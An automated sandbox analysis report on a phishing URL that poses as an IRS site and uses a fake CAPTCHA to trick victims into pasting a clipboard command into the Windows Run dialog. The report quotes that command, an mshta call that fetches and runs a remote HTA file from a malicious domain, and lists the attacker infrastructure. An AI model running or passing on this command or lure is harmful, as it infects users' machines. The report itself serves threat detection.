Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta http://kdori.xyz/am2v93vnqoavsdjl.hta Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected

Persistence and Installation Behavior
barindex
Detect drive by download via clipboard copy & paste
Source: Chrome DOM: 2.4 OCR Text: Cial website of the United States Government Charities Nonprofits Robot or human? Refunds Credits & Pay Search Check the box ta confirm that you're human. Thank You! I'm not a robot Verification Steps people understand 1. Press Windows Button Windows + R meet their tax responsibilitie 2. Press CTRL + V can we help you? 3. Press Enter for an Employer ID Number (EIN) Sign in to your account Control Alt et your refund status Get your tax record nd forms & instructions Check your federal tax withholdi Use our tax help tool
HTML page adds supicious text to clipboard
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Clipboard modification: mshta http://kdori.xyz/am2v93vnqoavsdjl.hta
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: mshta.exe, 00000014.00000002.2085234807.0000000002C9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta http://kdori.xyz/am2v93vnqoavsdjl.hta Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1696909 URL: https://lfkworld.nl/ Startdate: 22/05/2025 Architecture: WINDOWS Score: 80 21 kdori.xyz 2->21 31 Antivirus detection for URL or domain 2->31 33 AI detected phishing page 2->33 35 Detect drive by download via clipboard copy & paste 2->35 39 2 other signatures 2->39 7 chrome.exe 2 2->7         started        10 cmd.exe 1 2->10         started        12 chrome.exe 2->12         started        signatures3 37 Performs DNS queries to domains with low reputation 21->37 process4 dnsIp5 23 192.168.2.4, 138, 443, 49158 unknown unknown 7->23 14 chrome.exe 7->14         started        17 mshta.exe 14 10->17         started        19 conhost.exe 10->19         started        process6 dnsIp7 25 usadockfile.live 91.92.46.231, 443, 49734, 49735 TELECOMASET-ASBG Bulgaria 14->25 27 lfkworld.nl 185.174.40.195, 443, 49729, 49730 PORTUNITY-ASDE Netherlands 14->27 29 2 other IPs or domains 14->29
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.92.46.231
 usdoki.today Bulgaria 25211 TELECOMASET-ASBG false
185.174.40.195
 lfkworld.nl Netherlands 15987 PORTUNITY-ASDE false
142.250.68.36
 www.google.com United States 15169 GOOGLEUS false

Private

IP
192.168.2.4

Contacted Domains

Name IP Active
usdoki.today 91.92.46.231 true
www.google.com 142.250.68.36 true
usadockfile.live 91.92.46.231 true
lfkworld.nl 185.174.40.195 true
kdori.xyz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://usadockfile.live/checking-service.com-delivery.org/background2.png false
  • Avira URL Cloud: malware
 unknown
https://lfkworld.nl/favicon.ico false
  • Avira URL Cloud: safe
 unknown
https://usadockfile.live/checking-service.com-delivery.org/index.html true
    		unknown
    https://usadockfile.live/favicon.ico false
    • Avira URL Cloud: malware
    		 unknown
    https://usadockfile.live/checking-service.com-delivery.org/example_step3.gif false
    • Avira URL Cloud: malware
    		 unknown
    https://usdoki.today/ false
    • Avira URL Cloud: safe
    		 unknown
    https://usadockfile.live/ false
    • Avira URL Cloud: malware
    		 unknown
    https://usadockfile.live/checking-service.com-delivery.org/example_step1.gif false
    • Avira URL Cloud: malware
    		 unknown
    https://usadockfile.live/checking-service.com-delivery.org/fx.ico false
    • Avira URL Cloud: malware
    		 unknown
    https://lfkworld.nl/ false
      		unknown
      https://usadockfile.live/backblue.gif false
      • Avira URL Cloud: malware
      		 unknown
      https://usadockfile.live/fade.gif false
      • Avira URL Cloud: malware
      		 unknown
      https://usadockfile.live/checking-service.com-delivery.org/example_step2.gif false
      • Avira URL Cloud: malware
      		 unknown